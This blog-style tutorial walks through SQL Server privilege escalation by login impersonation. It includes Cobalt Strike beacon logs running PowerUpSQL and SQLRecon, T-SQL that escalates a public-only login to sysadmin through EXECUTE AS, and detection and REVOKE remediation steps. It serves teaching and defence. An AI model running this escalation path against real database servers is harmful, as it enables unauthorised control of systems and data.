Hi Friends,
Let's explore database user impersonation in SQL Server and what it means for security. The technique can be leveraged for privilege escalation and, once a sysadmin context is obtained, for command execution on the database host, so following it end to end shows how a low-privileged login can turn into a high-value attack path.
User Impersonation
User impersonation is a mechanism that lets a database principal temporarily assume the identity and permissions of another login or user. It exists for legitimate reasons: a task may need rights that the caller does not hold directly, and granting those rights only for the duration of a context switch or a stored procedure is narrower than granting them permanently.
SQL Server implements this through the EXECUTE AS statement. EXECUTE AS LOGIN switches the server-level security context, EXECUTE AS USER switches the database-level context, and a module (stored procedure, function or trigger) can be declared WITH EXECUTE AS so that its body runs as another principal; REVERT switches back. An explicit switch to another principal requires the IMPERSONATE permission on that principal, and it is exactly that grant, handed to the wrong login, that the rest of this post abuses.
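To make the mechanism concrete, here is an added lab script (example code, not from the original post) that creates two low-privilege logins and shows both impersonation paths: an explicit EXECUTE AS USER that needs an IMPERSONATE grant, and a stored procedure declared WITH EXECUTE AS OWNER. The database, login, schema and table names are assumptions for illustration; run it as sysadmin on a disposable instance.

```sql
-- Added lab example (not from the original post). Names (LabDB, low_priv,
-- app_owner, secrets.api_keys) are assumptions. Run as sysadmin on a lab box.
USE master;
GO
CREATE LOGIN low_priv WITH PASSWORD = 'Ch@ngeMe-LabOnly-1';
CREATE LOGIN app_owner WITH PASSWORD = 'Ch@ngeMe-LabOnly-2';
GO
CREATE DATABASE LabDB;
GO
USE LabDB;
GO
CREATE USER low_priv  FOR LOGIN low_priv;
CREATE USER app_owner FOR LOGIN app_owner;
-- app_owner owns the schema, so it implicitly has full rights on its objects.
CREATE SCHEMA secrets AUTHORIZATION app_owner;
GO
CREATE TABLE secrets.api_keys (id INT IDENTITY PRIMARY KEY, value NVARCHAR(200));
INSERT INTO secrets.api_keys (value) VALUES (N'constructed-sample-key');
GO

-- Path 1: explicit context switch. The grant below is the misconfiguration;
-- without it, EXECUTE AS USER = 'app_owner' fails for low_priv.
GRANT IMPERSONATE ON USER::app_owner TO low_priv;
GO
EXECUTE AS LOGIN = 'low_priv';
SELECT USER_NAME() AS db_user;                       -- low_priv
-- SELECT value FROM secrets.api_keys;               -- would fail: no SELECT grant
EXECUTE AS USER = 'app_owner';
SELECT USER_NAME() AS effective_user,                -- app_owner
       ORIGINAL_LOGIN() AS real_login;               -- low_priv (audit still sees this)
SELECT value FROM secrets.api_keys;                  -- succeeds as schema owner
REVERT;  -- back to low_priv
REVERT;  -- back to the sysadmin that started the batch
GO

-- Path 2: module-level impersonation. The procedure body runs as its owner
-- (app_owner, via the schema), so callers borrow those rights only inside it.
CREATE PROCEDURE secrets.read_keys
WITH EXECUTE AS OWNER
AS
    SELECT USER_NAME() AS runs_as, value FROM secrets.api_keys;
GO
GRANT EXECUTE ON secrets.read_keys TO low_priv;
GO
EXECUTE AS LOGIN = 'low_priv';
EXEC secrets.read_keys;   -- runs_as = app_owner; a direct SELECT would still fail
REVERT;
GO
```

Path 2 is the intended, scoped use of the feature: low_priv gets the owner's rights only for the statements inside the procedure. Path 1 is the dangerous one, because an IMPERSONATE grant hands over the whole principal, not a single operation, and nothing limits what the impersonating session does before it calls REVERT.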
Reconnaissance
For this walkthrough we assume an initial foothold in the network has already been obtained, typically a compromised workstation or server with a beacon running on it. For reconnaissance I use two tools, PowerUpSQL and SQLRecon, to find SQL Server instances and to identify which logins the current account is permitted to impersonate.
Finding Database Instance
The first step is to find out whether any Microsoft SQL Server instances exist in the domain. I use PowerUpSQL, imported into the Cobalt Strike beacon with powershell-import. Get-SQLInstanceDomain locates instances by querying Active Directory for MSSQLSvc service principal names, so this step touches only the domain controller and never the database servers themselves.
[12/09 09:03:22] beacon> powershell-import /opt/PowerUpSQL/PowerUpSQL.ps1
[12/09 09:03:23] [*] Tasked beacon to import: /opt/PowerUpSQL/PowerUpSQL.ps1
[12/09 09:03:24] [+] host called home, sent: 202189 bytes
[12/09 09:04:15] beacon> powershell Get-SQLInstanceDomain
[12/09 09:04:15] [*] Tasked beacon to run: Get-SQLInstanceDomain
[12/09 09:04:15] [+] host called home, sent: 329 bytes
[12/09 09:04:19] [+] received output:
ComputerName : sql-2.dev.***.io
Instance : sql-2.dev.***.io,1433
DomainAccountSid : 1500000521000672332383313895871914512914091400
DomainAccount : mssql_svc
DomainAccountCn : MS SQL Service
Service : MSSQLSvc
Spn : MSSQLSvc/sql-2.dev.***.io:1433
LastLogon : 1/24/2023 12:48 PM
Description :
Testing the Database Connection
Next we check whether the instance found above actually accepts a connection from the beacon's security context. Get-SQLConnectionTest attempts a login to the given host and port with the beacon's Windows credentials and reports whether the instance is accessible; a failure here means either no login exists for this account or a firewall is in the way.
[12/09 09:06:13] beacon> powershell Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
[12/09 09:06:13] [*] Tasked beacon to run: Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl
[12/09 09:06:13] [+] host called home, sent: 449 bytes
[12/09 09:06:15] [+] received output:
ComputerName : sql-2.dev.***.io
Instance : sql-2.dev.***.io,1433
Status : Accessible
Gathering Server Information
Get-SQLServerInfo collects details on the instance: the version and edition (useful for checking that build against known issues), the service account the instance runs under, the authentication mode, and whether the current login is a sysadmin. Two values in the output below matter for what follows: the service runs as DEV\mssql_svc, and our current login DEV\bfarmer is not a sysadmin.
[12/09 09:07:53] beacon> powershell Get-SQLServerInfo -Instance "sql-2.dev.***.io,1433"
[12/09 09:07:53] [*] Tasked beacon to run: Get-SQLServerInfo -Instance "sql-2.dev.***.io,1433"
[12/09 09:07:53] [+] host called home, sent: 425 bytes
[12/09 09:07:56] [+] received output:
ComputerName : sql-2.dev.***.io
Instance : SQL-2
DomainName : DEV
ServiceProcessID : 4504
ServiceName : MSSQLSERVER
ServiceAccount : DEV\mssql_svc
AuthenticationMode : Windows Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Standard Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : DEV\bfarmer
IsSysadmin : No
ActiveSessions : 1
Current Access Privileges
Next we check what privileges our current login, the account the beacon runs as, holds on the instance. SQLRecon with /a:wintoken authenticates using the beacon's Windows token; /m:whoami reports the login, the database user it maps to, and its server and database role memberships. The output below shows DEV\bfarmer maps to guest and is a member of nothing but the public role, which is the lowest possible level of access for an authenticated login.
[12/09 09:31:06] beacon> execute-assembly /opt/SharpCollection/SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:whoami
[12/09 09:31:07] [*] Tasked beacon to run .NET program: SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:whoami
[12/09 09:31:07] [+] host called home, sent: 307558 bytes
[12/09 09:31:09] [+] received output:
[*] Determining user permissions on sql-2.dev.***.io,1433
[*] Logged in as DEV\bfarmer
[*] Mapped to the user guest
[*] Roles:
|-> User is a member of public role.
|-> User is NOT a member of db_owner role.
|-> User is NOT a member of db_accessadmin role.
|-> User is NOT a member of db_securityadmin role.
|-> User is NOT a member of db_ddladmin role.
|-> User is NOT a member of db_backupoperator role.
|-> User is NOT a member of db_datareader role.
|-> User is NOT a member of db_datawriter role.
|-> User is NOT a member of db_denydatareader role.
|-> User is NOT a member of db_denydatawriter role.
|-> User is NOT a member of sysadmin role.
|-> User is NOT a member of setupadmin role.
|-> User is NOT a member of serveradmin role.
|-> User is NOT a member of securityadmin role.
|-> User is NOT a member of processadmin role.
|-> User is NOT a member of diskadmin role.
|-> User is NOT a member of dbcreator role.
|-> User is NOT a member of bulkadmin role.
Finding Accounts We Can Impersonate
With only public role membership, the next question is whether our login holds IMPERSONATE permission on any other login. SQLRecon's impersonate module queries the server catalog for IMPERSONATE grants; any login it lists can be assumed by our session with EXECUTE AS LOGIN, after which we act with that login's privileges.
[12/09 10:17:54] beacon> execute-assembly /opt/SharpCollection/SQLRecon.exe /a:wintoken /h:sql-2.dev.***.io,1433 /m:impersonate
[12/09 10:17:54] [*] Tasked beacon to run .NET program: SQLRecon.exe /a:wintoken /h:sql-2.dev.***.io,1433 /m:impersonate
[12/09 10:17:55] [+] host called home, sent: 307568 bytes
[12/09 10:17:57] [+] received output:
[*] Enumerating accounts that can be impersonated on sql-2.dev.***.io,1433
name |
-------
DEV\mssql_svc |
Impersonating the Account
The enumeration shows our login may impersonate DEV\mssql_svc, the instance's own service account. We now repeat the whoami check while impersonating it (/m:iwhoami with /i:DEV\mssql_svc) to see what privileges that context carries. The output below shows the impersonated login maps to dbo and is a member of sysadmin, so a login that started with nothing but public now has full control of the instance through a single EXECUTE AS.
[12/09 10:23:15] beacon> execute-assembly /opt/SharpCollection/SQLRecon.exe /a:wintoken /h:sql-2.dev.***.io,1433 /m:iwhoami /i:DEV\mssql_svc
[12/09 10:23:16] [*] Tasked beacon to run .NET program: SQLRecon.exe /a:wintoken /h:sql-2.dev.***.io,1433 /m:iwhoami /i:DEV\mssql_svc
[12/09 10:23:16] [+] host called home, sent: 307606 bytes
[12/09 10:23:18] [+] received output:
[*] Determining user permissions on sql-2.dev.***.io,1433 as 'DEV\mssql_svc'
[*] Logged in as DEV\mssql_svc
[*] Mapped to the user dbo
[*] [+] Roles:
|-> User is a member of public role.
|-> User is NOT a member of db_owner role.
|-> User is NOT a member of db_accessadmin role.
|-> User is NOT a member of db_securityadmin role.
|-> User is NOT a member of db_ddladmin role.
|-> User is NOT a member of db_backupoperator role.
|-> User is NOT a member of db_datareader role.
|-> User is NOT a member of db_datawriter role.
|-> User is NOT a member of db_denydatareader role.
|-> User is NOT a member of db_denydatawriter role.
|-> User is a member of sysadmin role.
|-> User is a member of setupadmin role.
|-> User is a member of serveradmin role.
|-> User is a member of securityadmin role.
|-> User is a member of processadmin role.
|-> User is a member of diskadmin role.
|-> User is a member of dbcreator role.
|-> User is a member of bulkadmin role.
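For readers who want to see what the last two SQLRecon steps do without the tool, here is an added T-SQL equivalent (example queries, not from the original post and not SQLRecon's own source), run as DEV\bfarmer against the instance from the page, followed by the defender-side fix. The host and login names are taken from the output above; the queries, the REVOKE and the expected values in the comments are mine.

```sql
-- Added example (not from the original post). Login names come from the page;
-- everything else is an assumption. Steps 1 and 2 run as DEV\bfarmer, step 3
-- as a real sysadmin.

-- 1. Who holds IMPERSONATE on whom? (what SQLRecon /m:impersonate reports)
--    For class 101 (SERVER_PRINCIPAL) major_id is the target login's id.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS target
     ON p.class = 101 AND p.major_id = target.principal_id
JOIN sys.server_principals AS grantee
     ON p.grantee_principal_id = grantee.principal_id
WHERE p.permission_name = 'IMPERSONATE';
-- expected on this host: DEV\bfarmer -> DEV\mssql_svc, GRANT
-- Note: no filter on SUSER_NAME(); a grant to a Windows group we belong to
-- shows under the group's name, not ours.

-- 2. Before/after comparison (what /m:whoami and /m:iwhoami report)
SELECT SUSER_NAME() AS login_name,            -- DEV\bfarmer
       USER_NAME()  AS db_user,               -- guest
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;   -- 0

EXECUTE AS LOGIN = 'DEV\mssql_svc';
SELECT SUSER_NAME()     AS login_name,        -- DEV\mssql_svc
       ORIGINAL_LOGIN() AS original_login,    -- DEV\bfarmer
       USER_NAME()      AS db_user,           -- dbo
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;   -- 1
-- Everything executed here runs with sysadmin rights. SQL Server Audit still
-- records the real login in session_server_principal_name, so a detection
-- rule should compare that column with server_principal_name.
REVERT;

-- 3. Remediation (as sysadmin): revoke the grant for the grantee found in
--    step 1, then confirm nothing can impersonate the service account.
REVOKE IMPERSONATE ON LOGIN::[DEV\mssql_svc] FROM [DEV\bfarmer];
SELECT COUNT(*) AS remaining_grants
FROM sys.server_permissions AS p
JOIN sys.server_principals AS target
     ON p.class = 101 AND p.major_id = target.principal_id
WHERE p.permission_name = 'IMPERSONATE'
  AND target.name = 'DEV\mssql_svc';          -- expected: 0
```

The revoke closes this particular path, but the underlying weaknesses are that the service account is a member of sysadmin and that an ordinary domain user has a login on the instance at all. Running the service under an account with no server roles, and reviewing every IMPERSONATE grant in sys.server_permissions on a schedule, removes the escalation rather than just this instance of it.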